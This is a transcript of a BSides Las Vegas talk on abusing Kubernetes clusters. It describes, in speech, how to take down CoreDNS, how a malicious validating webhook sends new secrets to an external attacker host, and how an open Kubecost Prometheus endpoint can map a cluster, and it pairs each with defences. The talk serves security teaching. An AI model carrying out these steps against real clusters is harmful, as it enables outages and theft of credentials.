From Interview Questions to Cluster Damage: Adventures in k8s Cluster Shenanigans

Name: From Interview Questions to Cluster Damage: Adventures in k8s Cluster Shenanigans
Uploaded: 2025-12-08
Duration: 45 min 24 s
Description: - “From Interview Questions to Cluster Damage: Adventures in k8s Cluster Shenanigans” - Shares discoveries from creating Kubernetes interview questions. - Reveals quirks and disruptions in cluster security. - Provides practical defense strategies. Location & Metadata: - Location: Common Ground, Flo

BSides Las Vegas45:248 viewsPublished 2025-12Watch on YouTube ↗

About this talk

- “From Interview Questions to Cluster Damage: Adventures in k8s Cluster Shenanigans” - Shares discoveries from creating Kubernetes interview questions. - Reveals quirks and disruptions in cluster security. - Provides practical defense strategies. Location & Metadata: - Location: Common Ground, Florentine F - Date/Time: Monday, 18:00–18:45 - Speakers: Travis Lowe, Amit Serper

Show transcript [en]

Alrighty. Good afternoon and welcome to Besides Las Vegas common ground track. This talk is from interview questions to cluster damage adventures in K8's cluster shenanigans by Amit Serper and Travis Low. A few announcements before we begin. We'd like to thank our sponsors uh especially Adobe and Iikido and then also Formal and Drop Zone AI. It's their support along with our other sponsors, donors and volunteers that make this event possible. These talks are being streamed live and as a courtesy to our speakers and audience, we ask that you check to make sure that your cell phones are set to silence. If you have a question, use that microphone just in the middle so YouTube can hear you. It's on and ready to go.

As a reminder, the B site's LV photo policy prohibits taking pictures without the explicit permission of everyone in frame. These talks are being recorded and will be available on YouTube in the future. Uh feel free to move to the front um so we can accommodate any more audience members. Uh with that, let's get started. Please welcome Emit and Travis. >> I think that's yours. >> All right. You have no idea how much appreciation I have for all nine of you, 10 that came uh to our talk. So, thank you so much for being here and for taking time to hear us rant. Uh, all right, let's begin. So, welcome to our talk from interview questions to cluster

damage adventures in Kubernetes cluster shenanigans. Next slide. Let's go. So, why are we here? You know, when we're talking about what the internet is like today, I always like to go back to the old adage that the internet is a series of tubes. I think it was said by a congress person and uh which explains a lot. Um but today in today's world when we're all doing cloud and magic and running things on other people's computers when we come to think of it everything eventually has Kubernetes behind it. So the internet is is actually a series of cubes. Uh there we go. or uh the way that I like to call it as a person who uh and

you'll you'll soon learn about it who does not come from a background of Kubernetes uh Kubernetes is a series of uh YAML induced headaches and we're going to talk about that too. So um so the origin of this talk is uh turns out one day we were just sitting there talking about um interviews that were upcoming and some questions that we wanted to ask the potential candidates and it went from a that's a good question to what would happen if and that's that's how we ended up with this talk is it was just a bunch of what would happen if um so if you came to this talk looking for like the coolest exploits or zero

days or anything along that nature you're in the wrong room because we're just going to be talking about whatif scenarios within a cluster. So there's nothing exploity here. >> Yeah. So for the obligatory who am I? So I'm a meet. I'm the guy with a weird name. Uh so uh I work at Crowd Strike. I do security research. Uh focused mainly on uh where Linux and cloud meet together, which is usually very shady places. Uh I've been doing this thing for nearly or over rather 20 years now which is says a lot about uh my sad state of affair. [laughter] Um and I'm actually not coming from the world from the world of cloud computing

and Kubernetes and all of that. I'm a low-level Linux guy and I'm proud to say that Travis made me respect uh Kubernetes. Uh these are my socials if you're interested and uh yeah. So I uh also do research. Uh I've been in cyber security for about 15 years, but I came at it from the other angle. So when he's all the low-level Linux, that's not really my thing. Uh I am much more at the higher cloudy level. Much it's more fun. It's more fun. Uh but I also made this guy like YAML. >> Lies. >> It's true. It's true. Um go for it. >> Yeah. So, I actually saw this meme not long ago, and I thought it's really

appropriate for uh for this talk because, you know, I definitely uh need therapy, but uh this is my house. Like, this is in my home. Uh this is my Kubernetes cluster. This is my big giant ass server in the basement that has two power supply units and is the sole reason of my very high electric bill. It's also a 15year-old server I got off of eBay, so it's very very inefficient. Um, yeah. So, you know, that's me. Oh. Oh. Oh, skipping forward. Uh, I've embraced many PCs, so I don't have the huge power bill. Um, but I too also run a Kubernetes cluster at home because why wouldn't you? >> And we're doing great by the way. Thank

you for asking. [laughter] >> Okay, so let's get a little more serious as much as we can. So why why are we here? >> So Kubernetes is this overengineered beast uh that has nothing to do with running at people's homes and running like four containers. It's completely stupid but you know we did it anyways. Uh but Kubernetes is as I said it's it's it's very complex. It has tons of component. Uh it has the API server and the scheduler and the and the controller manager and like all of these things that are that are always making sure that all of the workloads on your cluster run. So it's constantly looking at what at what's going on on your

Kubernetes cluster. If uh a container crashes for some reason or a pod goes down, it will immediately self-heal and it'll fix itself. But because it's so complicated, it's also like security can be a pain in the ass uh when we're talking about Kubernetes because you have arbback config arbback configs and you have like service accounts that you may have to make sure that um they're configured correctly and network policies and all and and and secrets management which uh we're there's a cool demo over there and there's like so many things that are happening all the time in your cluster and it only means that there are so many things that can go wrong if you have like a wrong configur

iguration or someone is doing naughty things inside your cluster. So, we're going to talk a lot about that, but in order to like have uh a common ground, hardy har uh I'll let Travis uh introduce you to some basic terms in Kubernetes. >> Yeah. So, for before we begin, I have a question for all of you. Um at all of my talks where I talk about Kubernetes, I always do a primer first just to make sure everyone's level set. Quick show of hands. Who knows what a replica set is? Okay, it's getting it's getting more people, so we'll have to stop doing this soon. Um, but so we're going to go through a quick primer. Um, for you Star

Trek fans, this is not a Death Star, which I've been told this kind of looks like. This is actually just paint primer. Um, so here we go. Um, so a quick overview. Um, so Meat mentioned, you know, there's the control plane. There's just all of these different components that are core components to it. um that help with all the automated things to make sure everything is at the state that you want. Um there's a lot that comes into it. Uh so when you first install Kubernetes, there are like 66, I think, default primitives that exist within a cluster and then you get to add more as you expand your capabilities. Um we're not going to talk about all of

them. What we care about today is just a few things. Um so let's let's kind of break this down uh from the outside in. So on the upper right we have an internet request that comes into a load balancer and then it talks to a service within Kubernetes. That service is just an object that helps route traffic to the pods that exist. The whole thing that it does is make sure that it goes to the right pods because pods come and go. Um and a pod is like the lowest level of a Kubernetes compute that it manages. uh anything below that is a container which the container runtime handles and containers get associated with pods uh via the kublet and a few

other things. A pod can exist inside a deployment which is basically a organizational structure that says I want two pods, three pods, four pods and kubernetes will go through and make sure that you've always got that state. uh if you just have a single pod running and it goes down, it's not going to come back. And that's what a deployment helps do is make sure that it's being managed so that it comes back up again. All of these things exist within a namespace. You can think of a namespace as just like a big organizational unit that exists on the cluster. It doesn't actually exist anywhere in the cluster physically outside of where it gets stored into a database. It's just more

of an abstracted um organizational unit. A pod can actually have more than one container as well. Typically, you'll see a one:1 ratio with a pod and a container, but depending on what's running on the underlying cluster, you may have like a networking sidecar for like ISTSTEO or something like that that's helping proxy traffic around the cluster. You may have security monitoring tools. You may have a logging capability. There's all kinds of different reasons why you might have more than one container in a pod. And that's just because they share uh similar Linux namespaces as they they spin up. Uh you know, back to that low-level Linux that I don't like. Um from the container runtime perspective,

you'll have this orchestrator, this agent that exists on the node. And you can think of a node as an EC2 instance or a virtual machine or a physical server. That's all a node is. And it joins the cluster um with the help of the Kublet, which is just a binary. It's like the agent for Kubernetes that runs on the cluster. and its whole thing outside of making sure that the node is up and healthy and it's reporting home the way it's supposed to is it talks to the container runtime to ensure that the containers that are supposed to be running on the node are actually running. I mentioned earlier that a namespace is kind of this weird abstraction for um

just an organizational unit and this is what it looks like when you start scaling up a cluster to two nodes. So you'll have a namespace that kind of exists ephemerally across all of them. Same thing with a deployment. It's more of just a definition of how you want state to be. And then here in this case, we have two pods on one node uh and one on the top node because we've defined that we want three replicas at any given time. So if one of them goes down, it'll spin up another one. It may or may not be on the same node. If the node goes down, Kubernetes will reschedule it and move it where it needs to go.

Switching gears a bit, let's talk about service accounts and just kind of more of like an arbback point of view. Um, in Kubernetes, a service account is a who, a role is a what, and then you need a role binding that says these two go together. So, if you're familiar with AWS, the role is basically like an AM policy. Uh, and then the service account is just an entity basically. Uh, but without all three of these working together, the service account is going to exist, but it's not going to be able to do anything. So, when it needs to talk to the Kubernetes API, it's going to get access denied. Another primitive in Kubernetes is a

secret. It's uh in my opinion a poorly named object in Kubernetes because it's not really a secret. Uh probably most of you noticed that the username and password there look very familiar and they are base 64 encoded and that's it. >> Encrypted. >> I'm sorry. Yes, you're right. Encrypted. Encrypted. Um so anyone who has access to the namespace and can read the secrets or anyone who can just read secrets across the entire cluster has access to these secrets. So a lot of times in mature organizations you'll see vaulting get used. So like Hashi Cororp vault or something like that instead of secrets but in smaller organizations secrets unfortunately they're misnamed but they they get used a lot for storing

really sensitive information. Uh and so here you know we've got admin decoded and then whatever I picked for the password down there. Um, as we talk about this YAML and break it down a little bit, um, we'll notice on line five, the the kind is secret. So that determines what the object is. So when you have a kind of pod, your YAML that is going to be defining a pod, so on and so forth for all of those 66 primitives, uh, plus whatever you add. Uh, the metadata where it says name, my secret 2 is actually the name of the object. It's the friendly name that is going to appear when you're talking to the API

server. Uh and then and then on line nine we have namespaces dev which is commented out but this secret would actually get deployed into that namespace. Um and so that's kind of like the typical schema that you'll see at a real high level within a Kubernetes cluster for all the YAML. Yeah. >> What is the type? Um so there are different types of secrets and it just affects the behavior of it basically. Uh and so this is a config map. So a config map is something that you would see um let's let's use the example of an engine X or an Apache web server because that's what everyone runs when it comes to Kubernetes is web servers. Uh a

config map would basically have your web config. Um so if you um consider what goes into config files typically uh in this case we've got a game demo. It's the likelihood of having a secret in here or something very sensitive is pretty high as well. And again this is just plain text. Uh so anyone who has access and can read these config maps can see those things. Uh that that namespace organizational unit can be thought of as a really soft security boundary. And you'll see a lot of Kubernetes admins say team A has access to these four namespaces and team B has access to these other namespaces. And that's how they prevent people from cross crosscontaminating.

But it is just relying on Kubernetes arbback. There is no other control that goes into place there. So, you're basically one layer away from Oops. All right, your turn. >> Yeah. So, I forgot to mention, um, we're going to ask questions. We We very much would like you to participate. There are very lucrative prizes right here. We worked very hard to source them. >> It was two separate Amazon orders. One arrived to my house, one arrived to Travis house. >> Transport them. >> We had to transport them here. >> Yeah. >> And Yeah. So please participate when we ask questions or else you won't get it which is a shame because we'll have to carry it back. [laughter]

>> Okay. So let's talk about Kubernetes security and visibility for a second because it's kind of a big deal and it's also kind of like complex. So as I said in the beginning I'm I'm a low-level guy. Uh I'm like an IDA guy. Let me reverse engineer things. Binary patching vulnerability research. That's my jam. And I wasn't really feeling the whole Kubernetes thing until I had this like sort of like a Eureka moment. I was like, oh wait, what if I will think of Kubernetes as a distributed operating system because like operating system like low-level research of operating system is kind of my jam. So what if I like just do like this sort of a head

fake and look at Kubernetes as a as a distributed operating system. And at least for me, the moment I started to think and view Kubernetes like that, things started making uh more sense for me at least. So, as I said, Kubernetes has like tons of different objects and primitives and all of these things work together. Even if you if you uh take Travis's example of like a a cluster role and a cluster roll binding and like all of these it's like three different things that have to like connect together. So all of the like the visibility into these things can be like sort of cumbersome and and and and difficult. Uh there's also like the

runtime side and the control plane side which are supposedly connected but they're not really because when you are running a pod, this pod is running a container on an operating system on a Linux machine and it has all of the Linux machine stuff that comes with it. So you need to have visibility into what's happening on the runtime side on like what the Linux machine is actually doing which is like more of like an EBR way of looking at things. But there's also everything that happens on the control plane. All of these objects that we've mentioned before that are interacting together you know millions of times per minute sometimes depending on how big your cluster is. So think about how can you

create a visibility for something even if you're a security product like how can you tie these two things together and this is often uh uh not an easy task. Um, clusters can hold many secrets and as Travis mentioned, secrets are not really secret unless you're uh working on making them secret, which which adds even more uh uh which adds even more complexity to things and we'll, you know, there's a there's a really cool demo uh that we're going to show you about that. Also, think about the fact that clusters, they run a lot of workloads. they're connected to a lot of places, especially if you're like fully in the cloud and like things are connected to your VPCs and to your

network. Sometimes even like uh um a workload like uh I don't know if you know WordPress, have you heard about it? uh sometimes it gets vulnerabilities and I mean think if there's like a vulnerability in a word WordPress or some other workload that you're running um and this pod happens to be connected to a whole bunch of other resources um in your network and again it could be like a network in the cloud like a VPC or like your organization it can add like even more issues and it can actually like pave the way for an attacker into your organization just by exploding like a shitty a WordPress site. So, all of these all of these

things, we need to keep them in mind when we're talking about um visibility and and monitoring. Um, another thing that I kind of like about attacking clusters is that old attacks are new again. So, all of the stuff that we like like massively scanning ports on a network like yeah, let's scan like a SL16. So like it's relevant again within a huge Kubernetes cluster because there is a lot of like subn networking that happens inside a cluster. Um so suddenly old tools that we almost like forgot about them or like things that are like you know just a gigantic end mapap scan is like yeah okay let's do that or mass scan like it's relevant again. Um and as

I said in the beginning like security products a lot of them they will tell you that they have good visibility. They'll tell you we have complete visibility into your Kubernetes deployment. Many times they don't. Many times they will show you what they can. Uh there are many different ways of collecting that data from a cluster. Uh it's not always trivial to tie everything together. Again, as I said, you have the control plane, you have the data plane or the runtime side of things. Tying this things is it's it's kind of complicated. So once we like we we we we have all of this information um in mind, let's begin with why we're here for actually. So as Travis said,

we're interviewing a lot at at Crowd Strike. We're interviewing a lot of people and there's a part of our interview that we do where we just ask like sort of like free form questions. So okay, we ask you like all of the knowledge questions that you should know or not, but then we're like, "Okay, let's let's play a game." Um, how would you like completely [ __ ] up a cluster? Like you have a working cluster and you want to do something really bad to it? How would you do that? And like again there are no wrong answers. I mean there are but like we mostly want to see like um how you think. So this is the part

where you can win a trophy and a medal. Uh so we would appreciate uh participation. Um, so let's say that you're an evil hacker and you have cluster access and sufficient privileges to the cluster. How would you keep the cluster from running and recovering broken and uh broken or new pods? Now, why are we asking this this question? Because if we are like roleplaying of like an an uh role playing in like this game where you're an attacker, um, when you want to see what's happening as a defender in Kubernetes, you might as an admin want to uh either exec into pods. So if you're not familiar, think of it as like sshing into a a Linux container, but

you're not really sshing into it. But that's basically you're getting a shell on on on your uh on your container. So you'd like to as an admin, you'd like to like exec into the pod and see what's running or you would like to spin up a new pod or a new container with some security tools on it. And we as the evil attacker, we want to keep these things from happening. So what would you do? So I would like to welcome you to a game of reverse DevOps Jenga. So it's basically like what parts can we remove to get everything to fall down because in Jenga it's the opposite, you know. Um so I'd also like to uh talk to you a little bit

uh about DNS and Kubernetes because it's a complicated hate story. So uh Kubernetes has a thing that's called core DNS and core DNS is everything that's in charge of DNS inside the cluster. Now the thing about a Kubernetes cluster which is kind of a cool feature is that when you're inside the cluster you can like everything uh you can do everything with DNS. You don't need to know the IP address of um of a container or a pod. You can just address it by DNS. And also the the kublet the the component that like talks to the to the uh API server also uses that. So everything uses DNS in Kubernetes. So sort of like a single

point of uh of of failure. So uh let's talk about a DNS resolution flow real quick. So a pod makes a DNS query. So for example you have uh my service. The query goes to to the core DNS pod. What core DNS is is just another uh another container that runs in in a different namespace, the coupe system namespace where all of the important Kubernetes stuff is. And it's just it's just a pod that does DNS things. Uh you would send a query core DNS checks its internal records and returns uh and returns an IP address like you know like DNS. And all of that is happening in the context of an already running pod.

So what happens if we take down DNS? So let's let's do it. The immediate impact if we cause DNS inside a cluster to fail would obviously be that new DNS queries from pods will fail. So if you have um a workload that needs to resolve some some host name be it inside the cluster or outside of cluster well it's not going to work. Um, obviously existing connections will remain unaffected, but eventually DNS resolution timeouts will occur and new requests are going to fail or they're going to take a lot of time until they time out, which is also uh also kind of annoying. Um, a default DNS query timeout in Kubernetes is uh about 5 seconds. So if things fail, things

freeze for five seconds, which is a lot of time, and then it's like sort of like a cascade of failures that come after that. Excuse me. Um, pods will eventually retry DNS queries based on their configuration and configuration varies obviously, but eventually you'll start getting errors and things will stop working. Uh, obviously, you know, some applications have some sort of like a DNS caching mechanism, but eventually things are going to fail. Like that's that's how it is. It's annoying, but it's not a complete disaster. So for the first question, what if the admin wants to start uh a pod with a new container? So DNS DNS is down right now and an admin wants to

start a pod with a new container. Who wants a trophy and an and a medal? Don't embarrass me. Yes.

There's a You mind using the mic? >> If if we're embarrassing you, might as well like do it with a microphone >> right here. Does it work though? >> I think so. >> Okay, good. >> So, first of all, the container need the like it needs to pull the container for somewhere. So, it would address some service that will pull the container. >> Okay. Okay. And if it doesn't have I I don't know if it just knows what that service is or if it needs DNS to do that >> already. It needs DNS and cord DNS is down. >> So what will happen is it will just fail and be in a loop until it starts.

>> Well, it's not the right answer, but you get a tr you you participated so it counts. Yeah. >> Like a half medal. >> This is yours. >> Another contender. Yeah, but I mean sort of cheating, right? You want to use like coupe control command to like spin up a new pod. So like any guess will it work? Will it fail?

>> That's cheating again. You get a trophy though. >> Okay, we're going to start running out of them. So [laughter] yeah, here's four. Definitely. >> Okay. Oh, wow. Look at Wow. Everybody wants a trophy. Yeah. Uh you first. Sorry.

>> Uh do you mind using the mic? I just can't hear you. And whoever is going to be miserable enough to watch that video afterwards won't be able to hear you. >> Yeah. So, uh if the admin wants to start a new container, no new code. >> Closer to the mic. >> Sorry. >> Yes. [laughter] Is it going to be in a It was more like a question. Is it going to be in like inconsistent state where it can't obtain an IP address? >> Mm-m. >> No. >> Sorry. Give this guy a trophy. >> Okay, last one and we'll move on. >> I think you could be able to uh create the the pod but not the container

because you don't have the new address for the container to actually uh be built. I think close but no cigar. Okay, we'll continue. So the thing is that um it's actually going to work. And the reason why it's actually going to work is that when you're pulling a new container, whoever is doing the DNS resolution is the kublet that sits on the node. So it's it's it's using the DNS that's configured in like the I don't know like /t/resolve.com on that node. So it's not going through cord DNS. So, it's actually going to work, which is like, but wait a minute, I just took down core DNS. Like, why do I why will it still work, right? It will

work. You'll be able to uh pull a container. So, the Kublet, as Travis mentioned, um is just this binary, this agent, this Kubernetes agent that sits on the on the node and configures it and manages um uh manages like DNS resolutions for inside and outside. Um it handles a whole bunch of things. It injects uh uh the cluster DNS settings. It it does a whole bunch of things where where it manages the cluster and everything about it. So, but um when you are doing DNS resolution on the on behalf of the Kublet when you're pulling a container um it will resolve through whatever DNS is configured on the host. Um but let's let's go back to breaking

stuff. So let's continue talking about uh like a cluster denive service. Let's let's break DNS. So in again in the setting of an interview um this is like a cool answer would like to see. So a thing that's important to remember about DNS about Kubernetes sorry it always tries to self-correct. So it's something falls it will make sure that you know a pod crashes it will reschedule it and rerun it. If some service or deployment dies, it will again try to rerun it because that gigantic list of objects that you saw earlier, they're all tied to each other. The API server is uh and and the and all the core components are always trying to make sure that whatever

it is that you defined in that horrible YAML uh and YAML YAML are terrible as as like a broad statement. Um whatever you defined in your YAML should always work no matter what fails. So we're basically trying to force things to fail. So what in that case we'd like to do is we'd like to patch the core DNS uh Damon set in Kubernetes to basically say I am only going to provide DNS services for uh nodes that have a certain label to them. So a label is like a tag. You can tag things or label things. And you can actually um run a command a command like that one here. I don't know if you can

see my I don't know if you can you see my pointer? No, you can't because it's the other screen. Computers are hard. So, if you run this command, what it's going to do, it's basically going to patch the cordian as Damon said and tell it, hey, if a node in your cluster doesn't have this label, in this example, I just call it like non-existent. So, if a label if that label isn't attached to a node, no DNS for you. So, again, this is a feature of Kubernetes. we're not exploiting anything. We're not there's not a vulnerability. It's just something that you can do. Um, so in that case, you won't have uh you won't have DNS on your

cluster. So at at that point, we were like, yeah, that's how it works. That's how Kubernetes works. Sure, we're security researchers. We've been doing this for a while. We know what we're doing. And then um we wanted to like model it in a lab environment so that we'll have a video and screenshots for this presentation. And then we realized that we're wrong and we don't know what we're talking about because even when we uh patched Damon set DNS kept working and if before I had three core DNS uh pods running I thought I killed all of them. I I thought I thought they're not going to work. I always had I always had one pod

that was there and was still working and I still had DNS even though I patched the Damon set. So why would you listen to me? Right. Um so then we're like okay that is that is not enough patching and and and patching that label in is not enough. We actually need to do that. And we also need to edit the uh the replica set of uh of cordns and make sure right here where that gigantic arrow is is that we're scaling it down to zero. So now even though things are supposed to work and spin back up, they're not going to spin back up again. feature. This is this is there's no black magic here, but

imagine doing that. Sorry. And I'll just finish this sentence and continue. Imagine imagine that you're a Kubernetes administrator or security guy and you have to like you have to figure out why are things not working and again it's a million different objects. It's a million different things. Where what do you look at? Where do you begin? Is it maybe it's like something with the node is wrong that it's not resolving things? Maybe it's something else. So, this is why visibility into your Kubernetes cluster is super important because if someone wants to like make you have make make you experience like a really bad day or like you want to he wants to cause you to have a bad time, it's

fairly easy and straightforward and it's like almost like part of the uh part of the thing. So, once we knock DNS down, a lot of other things are going to fail as well. So, uh, couproxy, which is the component that's in charge of managing all of the proxied connection in and out of your, uh, pods, that's going to not that's going to fail as well because there's no DNS. It can't resolve the IP addresses to the, um, pods that it needs to service. So now you have another thing that's falling down because another because a previous thing is falling down. So it's like Jenga when you're bad at it. So in this screenshot you can see

that me as like an admin I am trying to run a pod with the busy box image because I want to get a shell right and I just want to spin up this pod and do something but things are not working. I'm getting like weird warnings. Um like there's no DNS. I can't connect to anything. This host name Kubernetes service local is actually the API server the host name of the API server from within the cluster. So that even is not resolving. So like you're going to have a really bad time and trying to trace back what originated it and why things are not working. Unless you have really good visibility, you're just going to

have a bad time. So how do you prevent it? So just like everything with Kubernetes, proper arbback hygiene. So, make sure that only uh people that need to be a a cluster admin or have the ability to affect things in the coupe system namespace have them. Um, make sure you have some mutating uh web hooks that monitor critical components. And Travis will go into that as well. And obviously good monitoring and and like just writing good monitoring here and just telling you to have it. It's like, you know, it's it's like, hey, it's it's your problem. It's not mine, right? But it's it's really really important that even if you go and you you go shopping

for a security product, you need to make sure that it's it's really monitoring all the right things or not whatever the vendor is trying to tell you that they're monitoring. You have to make sure that this is happening. You know, again, we work for a security vendor and we're trying to um we're working on making sure that we have good monitoring. Um okay, Travis Low. >> Thank you. Thank you. Uh, okay. So, this is question for everyone here. Um, whoever gets to the mic first, well, I'm only going to do one because we are ticking away at time here. If you wanted to exfill data from a cluster, how would you do it? You can get two trophies. It's okay.

>> I'll try um HTTP proxy, I guess. Yeah, that's one way. Trophy. >> Trophy. Another medal, too. >> Absolutely. Yeah, absolutely. No, no, I'm not. >> Yeah. [laughter] Um, so one of the things that we discussed during our during our setup was uh using web hooks. So, uh, Amit just mentioned mutating web hooks. Um, let's talk about what a web hook is and then how you can use them for kind of like a persistent data xfill. Uh, during the admission process when you submit your YAML to a Kubernetes API server, uh, it goes through authentication, authorization, then it goes through any mutating admission. So, it looks at that kind. And so in the case of like a

secret, it looks for the kind of secret or a kind of pod or whatever it is that it wants to mutate and change and it will apply a change to your YAML for you automatically behind the scenes and you won't know it. This is really helpful uh in liketo so like a service mesh or something like that or security tools. The admission control the admins can basically say hey always apply a security tool to every new pod that comes into a cluster. That way your developers don't have to mess with it. They don't have to try to integrate with it. It just magically happens for them on the back end. It's really handy. It's really helpful

for an attacker. It's a really easy way to exfill data. Um, what slide was I on? Moving on. Okay. So, in in our scenario here, we have a malicious web hook that's going to exfill data. So, at point one, you have your developer who makes a request to the Kubernetes control plane there in the center. Uh we've got a rule, a validating web hook at the bottom that says, "Hey, validate all new secrets. Uh then step three, we configure the validating web hook to kick all of that traffic to our helpful, handy listening web server that the attacker controls. Four, the response comes back from the the web server and then it goes through the rest of the admissions process where

it goes to step five. Was it allowed? Was it not allowed? If it was, it gets written into the persistent data store for SCD, which is like the Kubernetes persist. It's like the the source of truth for Kubernetes. If it's denied, it goes the false path. Either way, it goes back to the user to let them know, hey, your workload was admitted or no, it wasn't. This is what a validating web hook looks like. Uh the only lines that we really care about today are the ones that are big and green. Uh so we've got the URL of admission.jellyparks.com. So we have a listing web server at this external location and then any new resource that gets um any new pod config

map or secret that gets created on the cluster uh the line right above where it says resources is operations create and update. So anytime a new workload gets admitted anytime a new secret gets created or anytime a new config map gets created it's going to send all of the definition file to the admission.jelyparks.com jelly parks.com. That way it can be validated and then the response will come back. Is it allowed? Is it not allowed? So as an attacker, if you have sufficient privileges, you could create this web hook and let it sit there. Maybe people will know, maybe they won't. Uh so let's go to a demo. Let's try a computer here. There's the mouse.

>> Hooray. >> Hooray. Oh, this is going to be fun. >> Stace. Just hit space. >> Yeah. Yeah. No, I'm just going to have to highlight and talk at the same time. Is it going? It's not going. We got it. We got it. Go team. Okay. So, right here we have our admission web server. Um, basically we've got um a slash validate route where we're listening to for post requests. And then we've got the UID, which is like the key for the request that we need to be able to return to Kubernetes. We're going to just print some things um if it's a secret because that's what we care about right now. We're just going to print it to the

terminal because this is just a demo. And then we're going to return, hey, it was allowed a 200 with a UID. That's all we're going to do. So here we've got um our Python server that we start. So now we're listening. Uh on the next tab here, we've got um a very similar definition that we just talked about um where we go to admission.jelyparks.com/validate. Uh and then we've got the operation that we care about is create as well as what resources we're monitoring for. This has already been applied to the cluster. Um, so here in a second we are going to delete a secret and then create one. So we're going to delete and create

maybe. There we go. So it says it's been created. And then if we go back to our web server, we'll see that we've got the secret printed out as well as the data. So anytime a new object gets created in the cluster, it's just going to go. Um, so it's a real sneakyish way to exfill data from a cluster. Um, bring the mouse back. Man, the computers. So, how do you stop this? >> Thing is still visible. >> Oh, the thing is still visible. Thank you. You questions. I I wanted to ask will this also like is a secret created in the same way also when you uh create a pod with a service account.

>> Yeah, absolutely. So in this case the web hook was looking for new pods. So any new pod definition that gets submitted anything in that manifest would be exported out to our listening web server. >> Yeah, but but the manifest doesn't have the secret but the >> correct service account token. Yeah, >> the service account token. No, that wouldn't be there because that gets mounted as a volume in the running pod once it spins up. Yeah. So, that wouldn't be there. Okay. >> But isn't it easier to just like run uh TCP dump or something like packet capture on all like you know start a port with a capability to >> you could uh if you had you know access

to the underlying node uh you could you'll run into a lot of certificate problems. So you'd have to export all of those certificates so you could you know unpack all the traffic and everything. >> Mhm. >> So >> you're also inside one specific node. >> Yeah. >> Right. You want to you want to look at all of everything that happens all over the cluster. >> Yeah. So this would be clusterwide. So for TCP dump Yeah. You'd have to be in every single node. >> Yeah. >> So there's a you could do it. Absolutely. It's another way. Yeah. >> Um so prevention around the the web hook healthy arbback is the key thing here. Um do your web hooks change in your

environment frequently? I'm guessing they don't. In most environments, they don't. So, you could have a noisy detection to monitor any change to those and then just ping your Kubernetes admin to say, "Hey, did you make this change?" It's really easy when uh and it gives you that extra layer beyond just relying on arbback. Uh and yes, cyclists do have to stop at stop sign. They're just like cars. >> Okay, >> I would I would skip this. >> Yeah, I'm going to we're going to skip this one. Um how would you enumerate a cluster? The anticipated answer is someone was going to say they were going to use mass scan or inmap or something along those lines or use cubectl to

interact with the API to say show me all of the things. That is true. It's a way you could do it. Um but you can actually do it with as little as one API request. Kubernetes has a huge ecosystem and Kubernetes admins, monitoring teams, networking teams, they install a lot of helpful applications so that they can monitor the health of the cluster. By default, a lot of them aren't necessarily the most secure. And so we're going to pick on one here called coupube cost, which is responsible for monitoring costs with of workloads and um you know tying it to a cost center basically. Uh all right. So we've got our Python application here. It's just um going to

make an API request on our behalf. So we're going to deploy it out to the cluster. Um, and then we're going to let that go and it's going to spin up and it's going to be initializing here. Yep. Okay. So, in here we've got on line 12 the API for coupube cost. Uh, this isn't just any API. This is actually the Prometheus API endpoint which monitoring teams use to monitor the health of applications. Uh and then we are going to format through the data and print it out to the screen in a really handy friendly way to to us basically and we're just picking on coupube cost here. There are lots of other applications that have the same exact problem. Uh

basically what it comes down to is when you install a helman chart uh they don't put security around these endpoints because they just open it to the cluster. And so with one single API call to coupubecost we have information about all of the load balancers. We have information about all of the nodes in the cluster and we also have all of the pods and what containers are in them as well as what namespace they're running in. Uh from a forensics point of view, from a responder point of view, this is nearly invisible because we're not talking to the Kubernetes API. We're not making hundreds and millions of requests to the network to say what API endpoints

exist here. We're making one API that blends in with normal traffic. Um let's go back.

for open ports. Uh so KubeCOS will happily tell you what services are running and where they're listening on. Other other applications like ISTTO, they'll they'll dump that information as well. Um Argo has all that information as well. And a lot of them have open Prometheus listening endpoints. Um the big fix here is network policies. You can think of a network policy as a firewall rule around your workloads. Most of the time those aren't deployed by default in Helm charts because the application owners, the maintainers of those applications, they don't know your environment. They don't know what teams need access to the data. So they just leave it open and up to you, which is kind of like an ethos of Kubernetes is

it's up to you to secure it. And so again here, it's up to you to secure it. Um, you need to ask yourself though, who manages those rules because it's a political battle inside your organization where no one wants to manage them. Okay, that was like a speedrun of the last little bit there. Um, any questions uh while we have some time left and then uh please remember rate is five stars. Oh, stop. You'll have to come up here and ask us questions. >> Thank you so much for taking the time. Yeah. >> [applause]

From Interview Questions to Cluster Damage: Adventures in k8s Cluster Shenanigans

Related talks